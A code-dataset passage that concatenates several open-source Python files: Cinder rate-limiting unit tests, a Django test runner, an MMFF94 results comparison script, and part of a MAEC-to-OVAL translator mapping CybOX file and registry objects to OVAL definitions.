raise NotImplementedError()
@property
def delete_key(self) -> Callable[
[recaptchaenterprise.DeleteKeyRequest],
Union[
empty_pb2.Empty,
Awaitable[empty_pb2.Empty]
]]:
raise NotImplementedError()
__all__ = (
'RecaptchaEnterpriseServiceV1Beta1Transport',
)
| apache-2.0 | -3,883,420,898,301,742,000 | 37.980237 | 161 | 0.614683 | false |
ge0rgi/cinder | cinder/tests/unit/api/v2/test_limits.py | 1 | 29139 | # Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests dealing with HTTP rate-limiting.
"""
from oslo_serialization import jsonutils
import six
from six.moves import http_client
from six.moves import range
import webob
from cinder.api.v2 import limits
from cinder.api import views
import cinder.context
from cinder import test
TEST_LIMITS = [
limits.Limit("GET", "/delayed", "^/delayed", 1, limits.PER_MINUTE),
limits.Limit("POST", "*", ".*", 7, limits.PER_MINUTE),
limits.Limit("POST", "/volumes", "^/volumes", 3, limits.PER_MINUTE),
limits.Limit("PUT", "*", "", 10, limits.PER_MINUTE),
limits.Limit("PUT", "/volumes", "^/volumes", 5, limits.PER_MINUTE),
]
NS = {
'atom': 'http://www.w3.org/2005/Atom',
'ns': 'http://docs.openstack.org/common/api/v1.0',
}
class BaseLimitTestSuite(test.TestCase):
"""Base test suite which provides relevant stubs and time abstraction."""
def setUp(self):
super(BaseLimitTestSuite, self).setUp()
self.time = 0.0
self.mock_object(limits.Limit, "_get_time", self._get_time)
self.absolute_limits = {}
def fake_get_project_quotas(context, project_id, usages=True):
return {k: dict(limit=v) for k, v in self.absolute_limits.items()}
self.mock_object(cinder.quota.QUOTAS, "get_project_quotas",
fake_get_project_quotas)
def _get_time(self):
"""Return the "time" according to this test suite."""
return self.time
class LimitsControllerTest(BaseLimitTestSuite):
"""Tests for `limits.LimitsController` class."""
def setUp(self):
"""Run before each test."""
super(LimitsControllerTest, self).setUp()
self.controller = limits.create_resource()
def _get_index_request(self, accept_header="application/json"):
"""Helper to set routing arguments."""
request = webob.Request.blank("/")
request.accept = accept_header
request.environ["wsgiorg.routing_args"] = (None, {
"action": "index",
"controller": "",
})
context = cinder.context.RequestContext('testuser', 'testproject')
request.environ["cinder.context"] = context
return request
def _populate_limits(self, request):
"""Put limit info into a request."""
_limits = [
limits.Limit("GET", "*", ".*", 10, 60).display(),
limits.Limit("POST", "*", ".*", 5, 60 * 60).display(),
limits.Limit("GET", "changes-since*", "changes-since",
5, 60).display(),
]
request.environ["cinder.limits"] = _limits
return request
def test_empty_index_json(self):
"""Test getting empty limit details in JSON."""
request = self._get_index_request()
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [],
"absolute": {},
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def test_index_json(self):
"""Test getting limit details in JSON."""
request = self._get_index_request()
request = self._populate_limits(request)
self.absolute_limits = {
'gigabytes': 512,
'volumes': 5,
}
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [
{
"regex": ".*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
{
"verb": "POST",
"next-available": "1970-01-01T00:00:00",
"unit": "HOUR",
"value": 5,
"remaining": 5,
},
],
},
{
"regex": "changes-since",
"uri": "changes-since*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00",
"unit": "MINUTE",
"value": 5,
"remaining": 5,
},
],
},
],
"absolute": {"maxTotalVolumeGigabytes": 512,
"maxTotalVolumes": 5, },
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def _populate_limits_diff_regex(self, request):
"""Put limit info into a request."""
_limits = [
limits.Limit("GET", "*", ".*", 10, 60).display(),
limits.Limit("GET", "*", "*.*", 10, 60).display(),
]
request.environ["cinder.limits"] = _limits
return request
def test_index_diff_regex(self):
"""Test getting limit details in JSON."""
request = self._get_index_request()
request = self._populate_limits_diff_regex(request)
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [
{
"regex": ".*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
],
},
{
"regex": "*.*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
],
},
],
"absolute": {},
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def _test_index_absolute_limits_json(self, expected):
request = self._get_index_request()
response = request.get_response(self.controller)
body = jsonutils.loads(response.body)
self.assertEqual(expected, body['limits']['absolute'])
def test_index_ignores_extra_absolute_limits_json(self):
self.absolute_limits = {'unknown_limit': 9001}
self._test_index_absolute_limits_json({})
class TestLimiter(limits.Limiter):
pass
class LimitMiddlewareTest(BaseLimitTestSuite):
"""Tests for the `limits.RateLimitingMiddleware` class."""
@webob.dec.wsgify
def _empty_app(self, request):
"""Do-nothing WSGI app."""
pass
def setUp(self):
"""Prepare middleware for use through fake WSGI app."""
super(LimitMiddlewareTest, self).setUp()
_limits = '(GET, *, .*, 1, MINUTE)'
self.app = limits.RateLimitingMiddleware(self._empty_app, _limits,
"%s.TestLimiter" %
self.__class__.__module__)
def test_limit_class(self):
"""Test that middleware selected correct limiter class."""
self.assertIsInstance(self.app._limiter, TestLimiter)
def test_good_request(self):
"""Test successful GET request through middleware."""
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(200, response.status_int)
def test_limited_request_json(self):
"""Test a rate-limited (413) GET request through middleware."""
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(200, response.status_int)
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(413, response.status_int)
self.assertIn('Retry-After', response.headers)
retry_after = int(response.headers['Retry-After'])
self.assertAlmostEqual(retry_after, 60, 1)
body = jsonutils.loads(response.body)
expected = "Only 1 GET request(s) can be made to * every minute."
value = body["overLimitFault"]["details"].strip()
self.assertEqual(expected, value)
class LimitTest(BaseLimitTestSuite):
"""Tests for the `limits.Limit` class."""
def test_GET_no_delay(self):
"""Test a limit handles 1 GET per second."""
limit = limits.Limit("GET", "*", ".*", 1, 1)
delay = limit("GET", "/anything")
self.assertIsNone(delay)
self.assertEqual(0, limit.next_request)
self.assertEqual(0, limit.last_request)
def test_GET_delay(self):
"""Test two calls to 1 GET per second limit."""
limit = limits.Limit("GET", "*", ".*", 1, 1)
delay = limit("GET", "/anything")
self.assertIsNone(delay)
delay = limit("GET", "/anything")
self.assertEqual(1, delay)
self.assertEqual(1, limit.next_request)
self.assertEqual(0, limit.last_request)
self.time += 4
delay = limit("GET", "/anything")
self.assertIsNone(delay)
self.assertEqual(4, limit.next_request)
self.assertEqual(4, limit.last_request)
def test_invalid_limit(self):
"""Test that invalid limits are properly checked on construction."""
self.assertRaises(ValueError, limits.Limit, "GET", "*", ".*", 0, 1)
class ParseLimitsTest(BaseLimitTestSuite):
"""Tests for the default limits parser in the `limits.Limiter` class."""
def test_invalid(self):
"""Test that parse_limits() handles invalid input correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
';;;;;')
def test_bad_rule(self):
"""Test that parse_limits() handles bad rules correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'GET, *, .*, 20, minute')
def test_missing_arg(self):
"""Test that parse_limits() handles missing args correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, 20)')
def test_bad_value(self):
"""Test that parse_limits() handles bad values correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, foo, minute)')
def test_bad_unit(self):
"""Test that parse_limits() handles bad units correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, 20, lightyears)')
def test_multiple_rules(self):
"""Test that parse_limits() handles multiple rules correctly."""
try:
l = limits.Limiter.parse_limits('(get, *, .*, 20, minute);'
'(PUT, /foo*, /foo.*, 10, hour);'
'(POST, /bar*, /bar.*, 5, second);'
'(Say, /derp*, /derp.*, 1, day)')
except ValueError as e:
self.assertFalse(six.text_type(e))
# Make sure the number of returned limits are correct
self.assertEqual(4, len(l))
# Check all the verbs...
expected = ['GET', 'PUT', 'POST', 'SAY']
self.assertEqual(expected, [t.verb for t in l])
# ...the URIs...
expected = ['*', '/foo*', '/bar*', '/derp*']
self.assertEqual(expected, [t.uri for t in l])
# ...the regexes...
expected = ['.*', '/foo.*', '/bar.*', '/derp.*']
self.assertEqual(expected, [t.regex for t in l])
# ...the values...
expected = [20, 10, 5, 1]
self.assertEqual(expected, [t.value for t in l])
# ...and the units...
expected = [limits.PER_MINUTE, limits.PER_HOUR,
limits.PER_SECOND, limits.PER_DAY]
self.assertEqual(expected, [t.unit for t in l])
class LimiterTest(BaseLimitTestSuite):
"""Tests for the in-memory `limits.Limiter` class."""
def setUp(self):
"""Run before each test."""
super(LimiterTest, self).setUp()
userlimits = {'limits.user3': '',
'limits.user0': '(get, *, .*, 4, minute);'
'(put, *, .*, 2, minute)'}
self.limiter = limits.Limiter(TEST_LIMITS, **userlimits)
def _check(self, num, verb, url, username=None):
"""Check and yield results from checks."""
for x in range(num):
yield self.limiter.check_for_delay(verb, url, username)[0]
def _check_sum(self, num, verb, url, username=None):
"""Check and sum results from checks."""
results = self._check(num, verb, url, username)
return sum(item for item in results if item)
def test_no_delay_GET(self):
"""Ensure no delay on a single call for a limit verb we didn't set."""
delay = self.limiter.check_for_delay("GET", "/anything")
self.assertEqual((None, None), delay)
def test_no_delay_PUT(self):
"""Ensure no delay on a single call for a known limit."""
delay = self.limiter.check_for_delay("PUT", "/anything")
self.assertEqual((None, None), delay)
def test_delay_PUT(self):
"""Test delay on 11th PUT request.
Ensure the 11th PUT will result in a delay of 6.0 seconds until
the next request will be granced.
"""
expected = [None] * 10 + [6.0]
results = list(self._check(11, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_delay_POST(self):
"""Test delay on 8th POST request.
Ensure the 8th POST will result in a delay of 6.0 seconds until
the next request will be granced.
"""
expected = [None] * 7
results = list(self._check(7, "POST", "/anything"))
self.assertEqual(expected, results)
expected = 60.0 / 7.0
results = self._check_sum(1, "POST", "/anything")
self.assertAlmostEqual(expected, results, 8)
def test_delay_GET(self):
"""Ensure the 11th GET will result in NO delay."""
expected = [None] * 11
results = list(self._check(11, "GET", "/anything"))
self.assertEqual(expected, results)
expected = [None] * 4 + [15.0]
results = list(self._check(5, "GET", "/foo", "user0"))
self.assertEqual(expected, results)
def test_delay_PUT_volumes(self):
"""Test delay on /volumes.
Ensure PUT on /volumes limits at 5 requests, and PUT elsewhere
is still OK after 5 requests...but then after 11 total requests,
PUT limiting kicks in.
"""
# First 6 requests on PUT /volumes
expected = [None] * 5 + [12.0]
results = list(self._check(6, "PUT", "/volumes"))
self.assertEqual(expected, results)
# Next 5 request on PUT /anything
expected = [None] * 4 + [6.0]
results = list(self._check(5, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_delay_PUT_wait(self):
"""Test limit is lifted again.
Ensure after hitting the limit and then waiting for
the correct amount of time, the limit will be lifted.
"""
expected = [None] * 10 + [6.0]
results = list(self._check(11, "PUT", "/anything"))
self.assertEqual(expected, results)
# Advance time
self.time += 6.0
expected = [None, 6.0]
results = list(self._check(2, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_multiple_delays(self):
"""Ensure multiple requests still get a delay."""
expected = [None] * 10 + [6.0] * 10
results = list(self._check(20, "PUT", "/anything"))
self.assertEqual(expected, results)
self.time += 1.0
expected = [5.0] * 10
results = list(self._check(10, "PUT", "/anything"))
self.assertEqual(expected, results)
expected = [None] * 2 + [30.0] * 8
results = list(self._check(10, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
def test_user_limit(self):
"""Test user-specific limits."""
self.assertEqual([], self.limiter.levels['user3'])
self.assertEqual(2, len(self.limiter.levels['user0']))
def test_multiple_users(self):
"""Tests involving multiple users."""
# User0
expected = [None] * 2 + [30.0] * 8
results = list(self._check(10, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
# User1
expected = [None] * 10 + [6.0] * 10
results = list(self._check(20, "PUT", "/anything", "user1"))
self.assertEqual(expected, results)
# User2
expected = [None] * 10 + [6.0] * 5
results = list(self._check(15, "PUT", "/anything", "user2"))
self.assertEqual(expected, results)
# User3
expected = [None] * 20
results = list(self._check(20, "PUT", "/anything", "user3"))
self.assertEqual(expected, results)
self.time += 1.0
# User1 again
expected = [5.0] * 10
results = list(self._check(10, "PUT", "/anything", "user1"))
self.assertEqual(expected, results)
self.time += 1.0
# User1 again
expected = [4.0] * 5
results = list(self._check(5, "PUT", "/anything", "user2"))
self.assertEqual(expected, results)
# User0 again
expected = [28.0]
results = list(self._check(1, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
self.time += 28.0
expected = [None, 30.0]
results = list(self._check(2, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
class WsgiLimiterTest(BaseLimitTestSuite):
"""Tests for `limits.WsgiLimiter` class."""
def setUp(self):
"""Run before each test."""
super(WsgiLimiterTest, self).setUp()
self.app = limits.WsgiLimiter(TEST_LIMITS)
def _request_data(self, verb, path):
"""Get data describing a limit request verb/path."""
return jsonutils.dump_as_bytes({"verb": verb, "path": path})
def _request(self, verb, url, username=None):
"""POST request to given url by given username.
Make sure that POSTing to the given url causes the given username
to perform the given action. Make the internal rate limiter return
delay and make sure that the WSGI app returns the correct response.
"""
if username:
request = webob.Request.blank("/%s" % username)
else:
request = webob.Request.blank("/")
request.method = "POST"
request.body = self._request_data(verb, url)
response = request.get_response(self.app)
if "X-Wait-Seconds" in response.headers:
self.assertEqual(403, response.status_int)
return response.headers["X-Wait-Seconds"]
self.assertEqual(204, response.status_int)
def test_invalid_methods(self):
"""Only POSTs should work."""
for method in ["GET", "PUT", "DELETE", "HEAD", "OPTIONS"]:
request = webob.Request.blank("/", method=method)
response = request.get_response(self.app)
self.assertEqual(405, response.status_int)
def test_good_url(self):
delay = self._request("GET", "/something")
self.assertIsNone(delay)
def test_escaping(self):
delay = self._request("GET", "/something/jump%20up")
self.assertIsNone(delay)
def test_response_to_delays(self):
delay = self._request("GET", "/delayed")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed")
self.assertEqual('60.00', delay)
def test_response_to_delays_usernames(self):
delay = self._request("GET", "/delayed", "user1")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed", "user2")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed", "user1")
self.assertEqual('60.00', delay)
delay = self._request("GET", "/delayed", "user2")
self.assertEqual('60.00', delay)
class FakeHttplibSocket(object):
"""Fake `http_client.HTTPResponse` replacement."""
def __init__(self, response_string):
"""Initialize new `FakeHttplibSocket`."""
if isinstance(response_string, six.text_type):
response_string = response_string.encode('utf-8')
self._buffer = six.BytesIO(response_string)
def makefile(self, mode, *args):
"""Returns the socket's internal buffer."""
return self._buffer
class FakeHttplibConnection(object):
"""Fake `http_client.HTTPConnection`."""
def __init__(self, app, host):
"""Initialize `FakeHttplibConnection`."""
self.app = app
self.host = host
def request(self, method, path, body="", headers=None):
"""Fake request handler.
Requests made via this connection actually get translated and
routed into our WSGI app, we then wait for the response and turn
it back into an `http_client.HTTPResponse`.
"""
if not headers:
headers = {}
req = webob.Request.blank(path)
req.method = method
req.headers = headers
req.host = self.host
req.body = body
resp = str(req.get_response(self.app))
resp = "HTTP/1.0 %s" % resp
sock = FakeHttplibSocket(resp)
self.http_response = http_client.HTTPResponse(sock)
self.http_response.begin()
def getresponse(self):
"""Return our generated response from the request."""
return self.http_response
def wire_HTTPConnection_to_WSGI(host, app):
"""Monkeypatches HTTPConnection.
Monkeypatches HTTPConnection so that if you try to connect to host, you
are instead routed straight to the given WSGI app.
After calling this method, when any code calls
http_client.HTTPConnection(host)
the connection object will be a fake. Its requests will be sent directly
to the given WSGI app rather than through a socket.
Code connecting to hosts other than host will not be affected.
This method may be called multiple times to map different hosts to
different apps.
This method returns the original HTTPConnection object, so that the caller
can restore the default HTTPConnection interface (for all hosts).
"""
class HTTPConnectionDecorator(object):
"""Decorator to mock the HTTPConecction class.
Wraps the real HTTPConnection class so that when you instantiate
the class you might instead get a fake instance.
"""
def __init__(self, wrapped):
self.wrapped = wrapped
def __call__(self, connection_host, *args, **kwargs):
if connection_host == host:
return FakeHttplibConnection(app, host)
else:
return self.wrapped(connection_host, *args, **kwargs)
oldHTTPConnection = http_client.HTTPConnection
new_http_connection = HTTPConnectionDecorator(http_client.HTTPConnection)
http_client.HTTPConnection = new_http_connection
return oldHTTPConnection
class WsgiLimiterProxyTest(BaseLimitTestSuite):
"""Tests for the `limits.WsgiLimiterProxy` class."""
def setUp(self):
"""setUp() for WsgiLimiterProxyTest.
Do some nifty HTTP/WSGI magic which allows for WSGI to be called
directly by something like the `http_client` library.
"""
super(WsgiLimiterProxyTest, self).setUp()
self.app = limits.WsgiLimiter(TEST_LIMITS)
oldHTTPConnection = (
wire_HTTPConnection_to_WSGI("169.254.0.1:80", self.app))
self.proxy = limits.WsgiLimiterProxy("169.254.0.1:80")
self.addCleanup(self._restore, oldHTTPConnection)
def _restore(self, oldHTTPConnection):
# restore original HTTPConnection object
http_client.HTTPConnection = oldHTTPConnection
def test_200(self):
"""Successful request test."""
delay = self.proxy.check_for_delay("GET", "/anything")
self.assertEqual((None, None), delay)
def test_403(self):
"""Forbidden request test."""
delay = self.proxy.check_for_delay("GET", "/delayed")
self.assertEqual((None, None), delay)
delay, error = self.proxy.check_for_delay("GET", "/delayed")
error = error.strip()
expected = ("60.00",
b"403 Forbidden\n\nOnly 1 GET request(s) can be "
b"made to /delayed every minute.")
self.assertEqual(expected, (delay, error))
class LimitsViewBuilderTest(test.TestCase):
def setUp(self):
super(LimitsViewBuilderTest, self).setUp()
self.view_builder = views.limits.ViewBuilder()
self.rate_limits = [{"URI": "*",
"regex": ".*",
"value": 10,
"verb": "POST",
"remaining": 2,
"unit": "MINUTE",
"resetTime": 1311272226},
{"URI": "*/volumes",
"regex": "^/volumes",
"value": 50,
"verb": "POST",
"remaining": 10,
"unit": "DAY",
"resetTime": 1311272226}]
self.absolute_limits = {"gigabytes": 1,
"backup_gigabytes": 2,
"volumes": 3,
"snapshots": 4,
"backups": 5}
def test_build_limits(self):
tdate = "2011-07-21T18:17:06"
expected_limits = {
"limits": {"rate": [{"uri": "*",
"regex": ".*",
"limit": [{"value": 10,
"verb": "POST",
"remaining": 2,
"unit": "MINUTE",
"next-available": tdate}]},
{"uri": "*/volumes",
"regex": "^/volumes",
"limit": [{"value": 50,
"verb": "POST",
"remaining": 10,
"unit": "DAY",
"next-available": tdate}]}],
"absolute": {"maxTotalVolumeGigabytes": 1,
"maxTotalBackupGigabytes": 2,
"maxTotalVolumes": 3,
"maxTotalSnapshots": 4,
"maxTotalBackups": 5}}}
output = self.view_builder.build(self.rate_limits,
self.absolute_limits)
self.assertDictEqual(expected_limits, output)
def test_build_limits_empty_limits(self):
expected_limits = {"limits": {"rate": [],
"absolute": {}}}
abs_limits = {}
rate_limits = []
output = self.view_builder.build(rate_limits, abs_limits)
self.assertDictEqual(expected_limits, output)
| apache-2.0 | -5,903,511,170,793,343,000 | 34.929716 | 79 | 0.529874 | false |
thesgc/cbh_datastore_ws | runtests.py | 1 | 1190 | import sys
try:
from django.conf import settings
from django.test.utils import get_runner
settings.configure(
DEBUG=True,
USE_TZ=True,
DATABASES={
"default": {
"ENGINE": "django.db.backends.sqlite3",
}
},
ROOT_URLCONF="cbh_datastore_ws.urls",
INSTALLED_APPS=[
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sites",
"cbh_datastore_ws",
],
SITE_ID=1,
MIDDLEWARE_CLASSES=(),
)
try:
import django
setup = django.setup
except AttributeError:
pass
else:
setup()
except ImportError:
import traceback
traceback.print_exc()
raise ImportError(
"To fix this error, run: pip install -r requirements-test.txt")
def run_tests(*test_args):
if not test_args:
test_args = ['tests']
# Run tests
TestRunner = get_runner(settings)
test_runner = TestRunner()
failures = test_runner.run_tests(test_args)
if failures:
sys.exit(bool(failures))
if __name__ == '__main__':
run_tests(*sys.argv[1:])
| mit | -6,751,464,929,567,952,000 | 20.25 | 71 | 0.553782 | false |
kylelutz/chemkit | tests/auto/plugins/mmff/analyze.py | 1 | 3504 | #!/usr/bin/python
# this script compares the mmff94.expected and mmff94.actual files
# and outputs the differences
import os
import sys
import xml.dom.minidom
COLORS_ENABLED = False
class AtomResults:
def __init__(self, type, charge):
self.type = type
self.charge = charge
class MoleculeResults:
def __init__(self, name, energy):
self.name = name
self.energy = energy
self.atoms = []
class ResultsFile:
def __init__(self, fileName):
self.fileName = fileName
self.molecules = []
def read(self):
doc = xml.dom.minidom.parse(self.fileName)
for moleculeElem in doc.getElementsByTagName('molecule'):
name = moleculeElem.getAttribute('name')
energy = float(moleculeElem.getAttribute('energy'))
moleculeResults = MoleculeResults(name, energy)
for atomElem in moleculeElem.getElementsByTagName('atom'):
type = atomElem.getAttribute('type')
charge = float(atomElem.getAttribute('charge'))
moleculeResults.atoms.append(AtomResults(type, charge))
self.molecules.append(moleculeResults)
if __name__ == '__main__':
actualResultsFile = 'mmff94.actual'
expectedResultsFile = 'mmff94.expected'
if not os.path.exists(actualResultsFile):
print 'could not find actual results file (%s)' % actualResultsFile
sys.exit(-1)
if not os.path.exists(expectedResultsFile):
print 'could not find expected results file (%s)' % expectedResultsFile
sys.exit(-1)
actualResults = ResultsFile(actualResultsFile)
actualResults.read()
expectedResults = ResultsFile(expectedResultsFile)
expectedResults.read()
# escape codes to color text
RED_COLOR = '\033[91m'
END_COLOR = '\033[0m'
if not COLORS_ENABLED:
RED_COLOR = ''
END_COLOR = ''
ATOMS_FAILED = 0
MOLECULES_FAILED = 0
# compare files
expectedMoleculeIndex = 0
for i, actualMolecule in enumerate(actualResults.molecules):
expectedMolecule = expectedResults.molecules[expectedMoleculeIndex]
while expectedMolecule.name != actualMolecule.name:
expectedMoleculeIndex += 1
expectedMolecule = expectedResults.molecules[expectedMoleculeIndex]
print '%i. %s' % (expectedMoleculeIndex+1, actualMolecule.name)
for j in range(len(actualMolecule.atoms)):
actualAtom = actualMolecule.atoms[j]
expectedAtom = expectedMolecule.atoms[j]
expectedTypeText = ''
colorCode = ''
if(actualAtom.type != expectedAtom.type or
(abs(actualAtom.charge - expectedAtom.charge) > 0.01)):
ATOMS_FAILED += 1
colorCode = RED_COLOR
expectedTypeText = '%s[%s, %s] -- FAILED%s' % (colorCode, expectedAtom.type, expectedAtom.charge, END_COLOR)
print ' %i. %s, %s %s' % (j+1, actualAtom.type, actualAtom.charge, expectedTypeText)
colorCode = ''
if(int(actualMolecule.energy) != int(expectedMolecule.energy)):
MOLECULES_FAILED += 1
colorCode = RED_COLOR
print 'energy: %f %s[%f]%s' % (actualMolecule.energy, colorCode, expectedMolecule.energy, END_COLOR)
# print some statistics
print >> sys.stderr, ''
print >> sys.stderr, 'atoms: %i failed' % ATOMS_FAILED
print >> sys.stderr, 'molecules: %i failed' % MOLECULES_FAILED
| bsd-3-clause | 8,729,999,212,681,322,000 | 32.371429 | 124 | 0.631849 | false |
MAECProject/maec-to-oval | cybox_oval_mappings.py | 1 | 10331 | #MAEC -> OVAL Translator
#v0.94 BETA
#Generic mappings class
#Generates OVAL tests/objects/states from a CybOX Defined Object
import oval57 as oval
class cybox_oval_mappings(object):
def __init__(self, id_namespace):
self.test_id_base = 0
self.obj_id_base = 0
self.ste_id_base = 0
self.def_id_base = 0
self.id_namespace = id_namespace
#Mappings
#CybOX Condition to OVAL operation mappings
self.operator_condition_mappings = {'Equals':'equals','DoesNotEqual':'not equal','Contains':'pattern match',\
'GreaterThan':'greater than', 'GreaterThanOrEqual':'greater than or equal',\
'LessThan':'less than','LessThanOrEqual':'less than or equal','FitsPattern':'pattern match',\
'BitwiseAnd':'bitwise and', 'BitwiseOr':'bitwise or'}
#CybOX Object Type to OVAL object mappings
self.object_mappings = {'WinRegistryKeyObj:WindowsRegistryKeyObjectType':'registry_object', 'FileObj:FileObjectType':'file_object',
'WinFileObj:WindowsFileObjectType':'file_object', 'WinExecutableFileObj:WindowsExecutableFileObjectType':'file_object'}
#CybOX FileObject to OVAL file_object mappings (CybOX element name : {OVAL element name, OVAL element datatype})
self.file_object_mappings = {'File_Path':{'name':'path','datatype':'string'},'Full_Path':{'name':'filepath','datatype':'string'},
'File_Name':{'name':'filename', 'datatype':'string'}}
#CybOX FileObject to OVAL file_state mappings
self.file_state_mappings = {'Size_In_Bytes':{'name':'size','datatype':'int'},'Accessed_Time':{'name':'a_time','datatype':'int'},\
'Modified_Time':{'name':'m_time','datatype':'int'},'Created_Time':{'name':'c_time','datatype':'int'}}
#CybOX WinRegistryObject to OVAL registry_object mappings
self.registry_object_mappings = {'Key':{'name':'key','datatype':'string'},'Hive':{'name':'hive','datatype':'string'},'Name':{'name':'name','datatype':'string'}}
#CybOX WinRegistryObject Values to OVAL registry_state mappings
self.registry_state_mappings = {'Name':{'name':'name','datatype':'string'},'Data':{'name':'value','datatype':'string'},'Datatype':{'name':'type','datatype':'string'}}
#Creates and returns a dictionary of OVAL test, object, and state (if applicable)
def create_oval(self, cybox_defined_object, reference):
oval_entities = {}
oval_states = []
object_type = cybox_defined_object._XSI_NS + ':' + cybox_defined_object._XSI_TYPE
if object_type in self.object_mappings.keys():
oval_object = self.create_oval_object(object_type, cybox_defined_object)
if oval_object is not None:
if object_type == 'WinRegistryKeyObj:WindowsRegistryKeyObjectType':
self.process_registry_values(cybox_defined_object, oval_object, oval_states)
else:
state = self.create_oval_state(object_type, cybox_defined_object)
if state is not None:
oval_states.append(self.create_oval_state(object_type, cybox_defined_object))
oval_test = self.create_oval_test(object_type, oval_object, oval_entities, oval_states, reference)
oval_entities['test'] = oval_test
oval_entities['object'] = oval_object
if oval_states is not None and len(oval_states) > 0:
oval_entities['state'] = oval_states
return oval_entities
else:
return None
#Create the OVAL object
def create_oval_object(self, object_type, cybox_defined_object):
oval_object_type = self.object_mappings.get(object_type)
oval_object_mappings = self.object_mappings.get(object_type) + '_mappings'
oval_object = getattr(oval,oval_object_type)()
oval_object.set_id(self.generate_obj_id())
oval_object.set_version(1)
object_fields = cybox_defined_object._fields
# File Object related corner cases
if "File" in object_type:
if object_fields["Full_Path"]:
del object_fields["File_Name"]
del object_fields["File_Path"]
# Corner case where file_path is meant to be used as the full path to the file
elif object_fields["File_Path"] and (not object_fields["Full_Path"] and not object_fields["File_Name"]):
object_fields["Full_Path"] = object_fields["File_Path"]
del object_fields["File_Path"]
for element, value in object_fields.items():
if value is not None:
if element in getattr(getattr(self,oval_object_mappings),'keys')():
element_dictionary = getattr(getattr(self,oval_object_mappings),'get')(element)
element_name = element_dictionary.get('name')
element_datatype = element_dictionary.get('datatype')
method = 'set_' + element_name
getattr(oval_object,method)(oval.EntityBaseType(datatype = element_datatype, operation = self.operator_condition_mappings.get(value), valueOf_=value))
#Do some basic object sanity checking for certain objects
if object_type == 'WinRegistryKeyObj:WindowsRegistryKeyObjectType' and (oval_object.hive is None or oval_object.key is None):
return None
elif 'FileObjectType' in object_type and (oval_object.filepath is None and (oval_object.path is None or oval_object.filename is None)):
return None
return oval_object
#Create any OVAL states
def create_oval_state(self, object_type, cybox_defined_object):
oval_state_type = self.object_mappings.get(object_type).split('_')[0] + '_state'
oval_state_mappings = oval_state_type + '_mappings'
oval_state = getattr(oval,oval_state_type)(version = 1, id = self.generate_ste_id())
oval_state.set_id(self.generate_ste_id())
object_fields = cybox_defined_object._fields
for element, value in object_fields.items():
if value is not None:
if element in getattr(getattr(self,oval_state_mappings),'keys')():
element_dictionary = getattr(getattr(self,oval_state_mappings),'get')(element)
element_name = element_dictionary.get('name')
element_datatype = element_dictionary.get('datatype')
method = 'set_' + element_name
getattr(oval_state,method)(oval.EntityBaseType(datatype = element_datatype, operation = self.operator_condition_mappings.get(value), valueOf_=value.value))
if oval_state.hasContent_():
return oval_state
#Create the OVAL test
def create_oval_test(self, object_type, oval_object, oval_entities, oval_states, reference = None):
oval_test_type = self.object_mappings.get(object_type).split('_')[0] + '_test'
#Create the test
comment = 'OVAL Test created from MAEC Action ' + reference
oval_test = getattr(oval,oval_test_type)(id = self.generate_test_id(), check = 'at least one', version=1.0, comment = comment)
oval_test.set_object(oval.ObjectRefType(object_ref = oval_object.get_id()))
if len(oval_states) > 0:
for state in oval_states:
if state is not None:
oval_test.add_state(oval.StateRefType(state_ref = state.get_id()))
return oval_test
#Handle any Values inside a Registry object
def process_registry_values(self, cybox_defined_object, oval_object, oval_states):
#Special registry Values handling
if cybox_defined_object.values is not None:
name_set = False
for reg_value in cybox_defined_object.values:
oval_state = oval.registry_state(version = 1, id = self.generate_ste_id())
for element, value in reg_value._fields.items():
if value is not None:
#Corner case for handling multiple name/value pairs in the OVAL object
if len(cybox_defined_object.values) == 1 and not name_set:
if element in self.registry_object_mappings.keys():
oval_element = self.registry_object_mappings.get(element)
method = 'set_' + oval_element.get('name')
getattr(oval_object,method)(oval.EntityBaseType(datatype = 'string', operation = self.operator_condition_mappings.get(value), valueOf_=value.value))
name_set = True
elif len(cybox_defined_object.values) > 1 and not name_set:
oval_object.set_name(oval.EntityBaseType(datatype = 'string', operation = 'pattern match', valueOf_='.*'))
name_set = True
if element in self.registry_state_mappings.keys():
